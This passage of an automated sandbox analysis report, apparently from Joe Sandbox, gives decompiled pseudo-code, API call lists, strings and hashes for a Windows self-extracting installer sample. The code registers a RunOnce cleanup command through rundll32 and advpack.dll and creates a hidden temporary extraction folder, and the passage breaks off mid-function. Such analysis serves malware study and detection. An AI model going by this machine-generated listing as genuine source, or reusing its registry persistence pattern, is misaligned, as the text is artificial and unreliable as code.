                                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				void _t56;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t72;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				intOrPtr* _t81;
                                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t89;
                                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t79 = __edx;
                                                                                                                                                                                                                                            				_t28 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                            				_t84 = 0x104;
                                                                                                                                                                                                                                            				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                            				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                            				_t66 = 0;
                                                                                                                                                                                                                                            				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					L24:
                                                                                                                                                                                                                                            					return E010D6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(_t86);
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E010D171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                            					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                            					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                            					if(_t41 != 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t87 = _t87 + 1;
                                                                                                                                                                                                                                            					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                            					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                            					_t79 = _t84;
                                                                                                                                                                                                                                            					E010D658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                            					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                            					_t84 = _t46;
                                                                                                                                                                                                                                            					if(_t84 == 0) {
                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0x10d9a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            							L17:
                                                                                                                                                                                                                                            							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							_pop(_t86);
                                                                                                                                                                                                                                            							goto L24;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						_t72 =  &_v268;
                                                                                                                                                                                                                                            						_t80 = _t72 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t49 =  *_t72;
                                                                                                                                                                                                                                            							_t72 = _t72 + 1;
                                                                                                                                                                                                                                            						} while (_t49 != 0);
                                                                                                                                                                                                                                            						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                            						_t81 = 0x10d91e4;
                                                                                                                                                                                                                                            						_t19 = _t81 + 1; // 0x10d91e5
                                                                                                                                                                                                                                            						_t89 = _t19;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t50 =  *_t81;
                                                                                                                                                                                                                                            							_t81 = _t81 + 1;
                                                                                                                                                                                                                                            						} while (_t50 != 0);
                                                                                                                                                                                                                                            						_t84 = _t73 + 0x50 + _t81 - _t89;
                                                                                                                                                                                                                                            						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - _t89);
                                                                                                                                                                                                                                            						if(_t90 != 0) {
                                                                                                                                                                                                                                            							 *0x10d8580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                            							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(0x10d91e4);
                                                                                                                                                                                                                                            							E010D171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                            							_t75 = _t90;
                                                                                                                                                                                                                                            							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                            							_t79 = _t23;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t56 =  *_t75;
                                                                                                                                                                                                                                            								_t75 = _t75 + 1;
                                                                                                                                                                                                                                            							} while (_t56 != 0);
                                                                                                                                                                                                                                            							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                            							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                            							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                            							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t79 = 0x4b5;
                                                                                                                                                                                                                                            						E010D44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                            					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                            					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                            					if(_t91 == 0) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            						E010D658A( &_v268, 0x104, 0x10d1140);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            				 *0x10d8530 = _t66;
                                                                                                                                                                                                                                            				goto L23;
                                                                                                                                                                                                                                            			}


































                                                                                                                                                                                                                                            0x010d202a
                                                                                                                                                                                                                                            0x010d2035
                                                                                                                                                                                                                                            0x010d203c
                                                                                                                                                                                                                                            0x010d2041
                                                                                                                                                                                                                                            0x010d2050
                                                                                                                                                                                                                                            0x010d205f
                                                                                                                                                                                                                                            0x010d2064
                                                                                                                                                                                                                                            0x010d206f
                                                                                                                                                                                                                                            0x010d208c
                                                                                                                                                                                                                                            0x010d2094
                                                                                                                                                                                                                                            0x010d2257
                                                                                                                                                                                                                                            0x010d2266
                                                                                                                                                                                                                                            0x010d2266
                                                                                                                                                                                                                                            0x010d209a
                                                                                                                                                                                                                                            0x010d209b
                                                                                                                                                                                                                                            0x010d209d
                                                                                                                                                                                                                                            0x010d20aa
                                                                                                                                                                                                                                            0x010d20af
                                                                                                                                                                                                                                            0x010d20c9
                                                                                                                                                                                                                                            0x010d20d1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d20d3
                                                                                                                                                                                                                                            0x010d20da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d20da
                                                                                                                                                                                                                                            0x010d20e2
                                                                                                                                                                                                                                            0x010d2103
                                                                                                                                                                                                                                            0x010d210e
                                                                                                                                                                                                                                            0x010d2116
                                                                                                                                                                                                                                            0x010d2122
                                                                                                                                                                                                                                            0x010d2128
                                                                                                                                                                                                                                            0x010d212c
                                                                                                                                                                                                                                            0x010d2179
                                                                                                                                                                                                                                            0x010d2194
                                                                                                                                                                                                                                            0x010d21de
                                                                                                                                                                                                                                            0x010d21e4
                                                                                                                                                                                                                                            0x010d2256
                                                                                                                                                                                                                                            0x010d2256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2256
                                                                                                                                                                                                                                            0x010d2196
                                                                                                                                                                                                                                            0x010d2196
                                                                                                                                                                                                                                            0x010d219c
                                                                                                                                                                                                                                            0x010d219f
                                                                                                                                                                                                                                            0x010d219f
                                                                                                                                                                                                                                            0x010d21a1
                                                                                                                                                                                                                                            0x010d21a2
                                                                                                                                                                                                                                            0x010d21a6
                                                                                                                                                                                                                                            0x010d21a8
                                                                                                                                                                                                                                            0x010d21ad
                                                                                                                                                                                                                                            0x010d21ad
                                                                                                                                                                                                                                            0x010d21b0
                                                                                                                                                                                                                                            0x010d21b0
                                                                                                                                                                                                                                            0x010d21b2
                                                                                                                                                                                                                                            0x010d21b3
                                                                                                                                                                                                                                            0x010d21bc
                                                                                                                                                                                                                                            0x010d21c7
                                                                                                                                                                                                                                            0x010d21cb
                                                                                                                                                                                                                                            0x010d21f1
                                                                                                                                                                                                                                            0x010d21f6
                                                                                                                                                                                                                                            0x010d21fd
                                                                                                                                                                                                                                            0x010d21ff
                                                                                                                                                                                                                                            0x010d21ff
                                                                                                                                                                                                                                            0x010d2204
                                                                                                                                                                                                                                            0x010d2213
                                                                                                                                                                                                                                            0x010d2218
                                                                                                                                                                                                                                            0x010d221d
                                                                                                                                                                                                                                            0x010d221d
                                                                                                                                                                                                                                            0x010d2220
                                                                                                                                                                                                                                            0x010d2220
                                                                                                                                                                                                                                            0x010d2222
                                                                                                                                                                                                                                            0x010d2223
                                                                                                                                                                                                                                            0x010d2229
                                                                                                                                                                                                                                            0x010d223d
                                                                                                                                                                                                                                            0x010d2249
                                                                                                                                                                                                                                            0x010d2250
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2250
                                                                                                                                                                                                                                            0x010d21d2
                                                                                                                                                                                                                                            0x010d21d9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d21d9
                                                                                                                                                                                                                                            0x010d213a
                                                                                                                                                                                                                                            0x010d2141
                                                                                                                                                                                                                                            0x010d2144
                                                                                                                                                                                                                                            0x010d214c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2163
                                                                                                                                                                                                                                            0x010d2172
                                                                                                                                                                                                                                            0x010d2172
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2163
                                                                                                                                                                                                                                            0x010d20ea
                                                                                                                                                                                                                                            0x010d20f0
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 010D2050
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 010D205F
                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 010D208C
                                                                                                                                                                                                                                              • Part of subcall function 010D171E: _vsnprintf.MSVCRT ref: 010D1750
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D20C9
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D20EA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 010D2103
                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D2122
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 010D2134
                                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D2144
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 010D215B
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D218C
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D21C1
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D21E4
                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 010D223D
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D2249
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D2250
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                            • String ID: %s /D:%s$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                                                                                                                                                                                                            • API String ID: 178549006-4264933467
                                                                                                                                                                                                                                            • Opcode ID: 5223cf364f92c69e55e00bcb9848098562d76c52a97c67dbcbf0c9afb6d96d68
                                                                                                                                                                                                                                            • Instruction ID: 8d1a3d47011323622309a21cf03de7f05142ac7ffcb73a483c0e2085f8f52de0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5223cf364f92c69e55e00bcb9848098562d76c52a97c67dbcbf0c9afb6d96d68
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6851F179A01314ABDB309B74DC48FFA7B7CEB50700F0081A9FEC9E7145DA769A858B60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 232 10d55a0-10d55d9 call 10d468f LocalAlloc 235 10d55fd-10d560c call 10d468f 232->235 236 10d55db-10d55f1 call 10d44b9 call 10d6285 232->236 241 10d560e-10d5630 call 10d44b9 LocalFree 235->241 242 10d5632-10d5643 lstrcmpA 235->242 251 10d55f6-10d55f8 236->251 241->251 245 10d564b-10d5659 LocalFree 242->245 246 10d5645 242->246 249 10d565b-10d565d 245->249 250 10d5696-10d569c 245->250 246->245 254 10d565f-10d5667 249->254 255 10d5669 249->255 252 10d589f-10d58b5 call 10d6517 250->252 253 10d56a2-10d56a8 250->253 256 10d58b7-10d58c7 call 10d6ce0 251->256 252->256 253->252 257 10d56ae-10d56c1 GetTempPathA 253->257 254->255 258 10d566b-10d567a call 10d5467 254->258 255->258 262 10d56f3-10d5711 call 10d1781 257->262 263 10d56c3-10d56c9 call 10d5467 257->263 270 10d589b-10d589d 258->270 271 10d5680-10d5691 call 10d44b9 258->271 275 10d586c-10d5890 GetWindowsDirectoryA call 10d597d 262->275 276 10d5717-10d5729 GetDriveTypeA 262->276 269 10d56ce-10d56d0 263->269 269->270 273 10d56d6-10d56df call 10d2630 269->273 270->256 271->251 273->262 288 10d56e1-10d56ed call 10d5467 273->288 275->262 289 10d5896 275->289 280 10d572b-10d572e 276->280 281 10d5730-10d5740 GetFileAttributesA 276->281 280->281 282 10d5742-10d5745 280->282 281->282 283 10d577e-10d578f call 10d597d 281->283 286 10d576b 282->286 287 10d5747-10d574f 282->287 298 10d5791-10d579e call 10d2630 283->298 299 10d57b2-10d57bf call 10d2630 283->299 291 10d5771-10d5779 286->291 287->291 292 10d5751-10d5753 287->292 288->262 288->270 289->270 296 10d5864-10d5866 291->296 292->291 295 10d5755-10d5762 call 10d6952 292->295 295->286 309 10d5764-10d5769 295->309 296->275 296->276 298->286 306 10d57a0-10d57b0 call 10d597d 298->306 307 10d57c1-10d57cd GetWindowsDirectoryA 299->307 308 10d57d3-10d57f8 call 10d658a GetFileAttributesA 299->308 306->286 306->299 307->308 314 10d580a 308->314 315 10d57fa-10d5808 CreateDirectoryA 308->315 309->283 309->286 316 10d580d-10d580f 314->316 315->316 317 10d5827-10d585c SetFileAttributesA call 10d1781 call 10d5467 316->317 318 10d5811-10d5825 316->318 317->270 323 10d585e 317->323 318->296 323->296
                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E010D55A0(void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v265;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				int _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t35;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				int _t40;
                                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                                            				long _t48;
                                                                                                                                                                                                                                            				int _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				int _t54;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				char _t60;
                                                                                                                                                                                                                                            				int _t65;
                                                                                                                                                                                                                                            				char _t66;
                                                                                                                                                                                                                                            				int _t67;
                                                                                                                                                                                                                                            				int _t68;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				int _t70;
                                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                            				int _t73;
                                                                                                                                                                                                                                            				CHAR* _t82;
                                                                                                                                                                                                                                            				CHAR* _t88;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                            				_t2 = E010D468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                            				if(_t109 != 0) {
                                                                                                                                                                                                                                            					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                            					_t32 = E010D468F(_t82, _t109, 1);
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                            						__eflags = _t33;
                                                                                                                                                                                                                                            						if(_t33 == 0) {
                                                                                                                                                                                                                                            							 *0x10d9a30 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						_t35 =  *0x10d8b3e; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t35;
                                                                                                                                                                                                                                            						if(_t35 == 0) {
                                                                                                                                                                                                                                            							__eflags =  *0x10d8a24; // 0x0
                                                                                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                                                                                            								L46:
                                                                                                                                                                                                                                            								_t101 = 0x7d2;
                                                                                                                                                                                                                                            								_t36 = E010D6517(_t82, 0x7d2, 0, E010D3210, 0, 0);
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0x10d9a30;
                                                                                                                                                                                                                                            								if( *0x10d9a30 != 0) {
                                                                                                                                                                                                                                            									goto L46;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t109 = 0x10d91e4;
                                                                                                                                                                                                                                            									_t40 = GetTempPathA(0x104, 0x10d91e4);
                                                                                                                                                                                                                                            									__eflags = _t40;
                                                                                                                                                                                                                                            									if(_t40 == 0) {
                                                                                                                                                                                                                                            										L19:
                                                                                                                                                                                                                                            										_push(_t82);
                                                                                                                                                                                                                                            										E010D1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                            										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                            										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                            											do {
                                                                                                                                                                                                                                            												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                            												__eflags = _t109 - 6;
                                                                                                                                                                                                                                            												if(_t109 == 6) {
                                                                                                                                                                                                                                            													L22:
                                                                                                                                                                                                                                            													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                            													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L23;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													__eflags = _t109 - 3;
                                                                                                                                                                                                                                            													if(_t109 != 3) {
                                                                                                                                                                                                                                            														L23:
                                                                                                                                                                                                                                            														__eflags = _t109 - 2;
                                                                                                                                                                                                                                            														if(_t109 != 2) {
                                                                                                                                                                                                                                            															L28:
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															goto L29;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                            															if(_t66 == 0x41) {
                                                                                                                                                                                                                                            																L29:
                                                                                                                                                                                                                                            																_t60 = _t66 + 1;
                                                                                                                                                                                                                                            																_v268 = _t60;
                                                                                                                                                                                                                                            																goto L42;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                            																if(_t66 == 0x42) {
                                                                                                                                                                                                                                            																	goto L29;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t68 = E010D6952( &_v268);
                                                                                                                                                                                                                                            																	__eflags = _t68;
                                                                                                                                                                                                                                            																	if(_t68 == 0) {
                                                                                                                                                                                                                                            																		goto L28;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                            																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                            																			L30:
                                                                                                                                                                                                                                            																			_push(0);
                                                                                                                                                                                                                                            																			_t103 = 3;
                                                                                                                                                                                                                                            																			_t49 = E010D597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                            																			__eflags = _t49;
                                                                                                                                                                                                                                            																			if(_t49 != 0) {
                                                                                                                                                                                                                                            																				L33:
                                                                                                                                                                                                                                            																				_t50 = E010D2630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t50;
                                                                                                                                                                                                                                            																				if(_t50 != 0) {
                                                                                                                                                                                                                                            																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t88 =  &_v268;
                                                                                                                                                                                                                                            																				E010D658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                            																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                            																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                            																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                            																					__eflags = _t54;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				__eflags = _t54;
                                                                                                                                                                                                                                            																				if(_t54 != 0) {
                                                                                                                                                                                                                                            																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                            																					_push(_t88);
                                                                                                                                                                                                                                            																					_t109 = 0x10d91e4;
                                                                                                                                                                                                                                            																					E010D1781(0x10d91e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                            																					_t101 = 1;
                                                                                                                                                                                                                                            																					_t59 = E010D5467(0x10d91e4, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t59;
                                                                                                                                                                                                                                            																					if(_t59 != 0) {
                                                                                                                                                                                                                                            																						goto L45;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t60 = _v268;
                                                                                                                                                                                                                                            																						goto L42;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                            																					_v265 = 0;
                                                                                                                                                                                                                                            																					_v268 = _t60;
                                                                                                                                                                                                                                            																					goto L42;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				_t65 = E010D2630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t65;
                                                                                                                                                                                                                                            																				if(_t65 != 0) {
                                                                                                                                                                                                                                            																					goto L28;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t67 = E010D597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t67;
                                                                                                                                                                                                                                            																					if(_t67 == 0) {
                                                                                                                                                                                                                                            																						goto L28;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						goto L33;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			goto L28;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L22;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L47;
                                                                                                                                                                                                                                            												L42:
                                                                                                                                                                                                                                            												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                            											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										goto L43;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t101 = 1;
                                                                                                                                                                                                                                            										_t69 = E010D5467(0x10d91e4, 1, 3); // executed
                                                                                                                                                                                                                                            										__eflags = _t69;
                                                                                                                                                                                                                                            										if(_t69 != 0) {
                                                                                                                                                                                                                                            											goto L45;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t82 = 0x10d91e4;
                                                                                                                                                                                                                                            											_t70 = E010D2630(0, 0x10d91e4, 1);
                                                                                                                                                                                                                                            											__eflags = _t70;
                                                                                                                                                                                                                                            											if(_t70 != 0) {
                                                                                                                                                                                                                                            												goto L19;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t101 = 1;
                                                                                                                                                                                                                                            												_t82 = 0x10d91e4;
                                                                                                                                                                                                                                            												_t71 = E010D5467(0x10d91e4, 1, 1);
                                                                                                                                                                                                                                            												__eflags = _t71;
                                                                                                                                                                                                                                            												if(_t71 != 0) {
                                                                                                                                                                                                                                            													goto L45;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													do {
                                                                                                                                                                                                                                            														goto L19;
                                                                                                                                                                                                                                            														L43:
